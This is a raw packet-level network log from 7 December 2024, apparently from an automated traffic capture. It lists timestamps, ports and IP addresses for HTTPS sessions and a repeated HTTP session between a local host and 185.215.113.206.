Dec 7, 2024 10:51:04.288417101 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.296785116 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.296875000 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.296921968 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.305351019 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.305459023 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.305516005 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.542211056 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.542264938 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.578650951 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.578704119 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.578780890 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.586875916 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.586895943 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.598789930 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:04.654115915 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:04.662111998 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.662163019 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.662288904 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.662348986 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.662406921 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.824701071 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:04.872893095 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:05.016797066 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:05.036516905 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:05.156644106 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:05.403975010 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.404053926 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.404118061 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:05.408205986 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.408266068 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.408324003 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:05.416755915 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.416963100 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.417023897 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:05.425348997 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.425393105 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.425453901 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:05.433868885 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.433985949 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:05.434046030 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:05.451005936 CET	49674	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:05.453988075 CET	49673	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:05.580760956 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:05.622909069 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:05.765980005 CET	49672	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:06.101592064 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:06.101636887 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:06.101706028 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:06.101826906 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:06.101867914 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:06.101918936 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:06.104720116 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:06.104736090 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:06.104907990 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:06.104923964 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:06.438962936 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:06.439064980 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:06.452733994 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:06.452765942 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:06.453201056 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:06.453521967 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:06.453594923 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:06.453684092 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.157815933 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.157850981 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.157898903 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.157927990 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:07.157963037 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.157984972 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:07.158607960 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:07.158637047 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:07.158801079 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.158870935 CET	443	49708	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:07.158915997 CET	49708	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:07.882529974 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.882631063 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.883490086 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.883560896 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.921780109 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.921803951 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.921812057 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.921833038 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.922138929 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.922169924 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.922230005 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.922235012 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.923403978 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.923427105 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:07.923429012 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:07.923472881 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.409336090 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.409360886 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.409423113 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.409432888 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.409473896 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.409480095 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.409490108 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.409519911 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.409543991 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.411773920 CET	49710	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.411788940 CET	443	49710	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.607702017 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.607723951 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.607803106 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.607816935 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.607831001 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:08.607888937 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.611685038 CET	49709	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:08.611701012 CET	443	49709	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:11.853564024 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:11.973315001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:11.973572969 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:11.974153042 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:12.093888998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:12.195066929 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:12.195132017 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:12.195230961 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:12.195842981 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:12.195862055 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:13.315779924 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:13.316273928 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:13.349231005 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:13.469005108 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:13.806977034 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:13.807118893 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:13.808861971 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:13.928702116 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.254066944 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.254101038 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.254125118 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.254169941 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.409683943 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.409754992 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.414571047 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.414591074 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.414810896 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.416471958 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.416527033 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.416532993 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.416738033 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.445992947 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.446058989 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.447406054 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.459332943 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.567256927 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.868830919 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.868901968 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:14.869046926 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.869138956 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.869189978 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:14.869293928 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.869478941 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.869530916 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:14.870374918 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.872703075 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.872723103 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:14.874010086 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.874031067 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:14.881375074 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:14.881393909 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:14.892465115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.892568111 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.892592907 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.892760038 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.893510103 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.893579960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.893590927 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.893615961 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.893762112 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.894527912 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.894603014 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.894638062 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.894845009 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.902853012 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:14.902955055 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:14.958642960 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.958719969 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.959213018 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.959709883 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:14.959738016 CET	443	49714	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:14.959765911 CET	49714	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:15.060360909 CET	49674	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:15.060364962 CET	49673	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:15.084408998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.084592104 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:15.085748911 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:15.205892086 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.373395920 CET	49672	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:15.531321049 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.531440973 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:15.564750910 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:15.564750910 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:15.684680939 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.684691906 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.684746981 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.684787035 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.684829950 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:15.684879065 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:16.521513939 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:16.521569967 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:16.640054941 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.640125036 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.640252113 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.640326023 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.649887085 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.649971008 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.755222082 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.755243063 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.755599976 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.755683899 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.764328003 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.764345884 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.764501095 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.764507055 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.764650106 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.764700890 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.765372992 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.765403032 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.765530109 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.765538931 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.765707970 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.765759945 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.765983105 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:16.766019106 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:16.791380882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:16.911084890 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.234266043 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.234328985 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.234334946 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.234368086 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.236581087 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.236635923 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.236687899 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.236802101 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.244997025 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.245043039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.245112896 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.245162010 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.250827074 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.250849962 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.250885963 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.250895977 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.250909090 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.250921965 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.250943899 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.250967026 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.252950907 CET	49716	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.252964973 CET	443	49716	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.253396034 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.253463030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.253509045 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.253581047 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.261873960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.261929989 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.261965990 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.262010098 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.270204067 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.270283937 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.364742041 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.364820004 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.364860058 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.365025043 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.368922949 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.368994951 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.369796038 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.369867086 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.369911909 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.369959116 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.378227949 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.378304958 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.378345013 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.378452063 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.386663914 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.386730909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.386769056 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.386815071 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.395148039 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.395207882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.395348072 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.395458937 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.429485083 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.429541111 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.429548025 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.429585934 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.433449984 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.433518887 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.433567047 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.433666945 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.441852093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.441922903 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.441941023 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.444037914 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.450244904 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.450293064 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.450392008 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.450448036 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.458687067 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.458736897 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.458769083 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.458823919 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.464102030 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.464124918 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.464176893 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.464206934 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.464217901 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.464219093 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.464339018 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.467024088 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.467124939 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.467132092 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.467174053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.469796896 CET	49715	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.469820023 CET	443	49715	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.475708961 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.475745916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.475804090 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.475805044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.498979092 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.499036074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.499305964 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.499377012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.500703096 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.500736952 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.500786066 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.500819921 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.500838041 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.500865936 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.500899076 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.502927065 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.502994061 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.502995014 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.503154039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.510693073 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.510719061 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.510751963 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.510776997 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.516917944 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.516978979 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.516980886 CET	49713	80	192.168.2.6	185.215.113.206
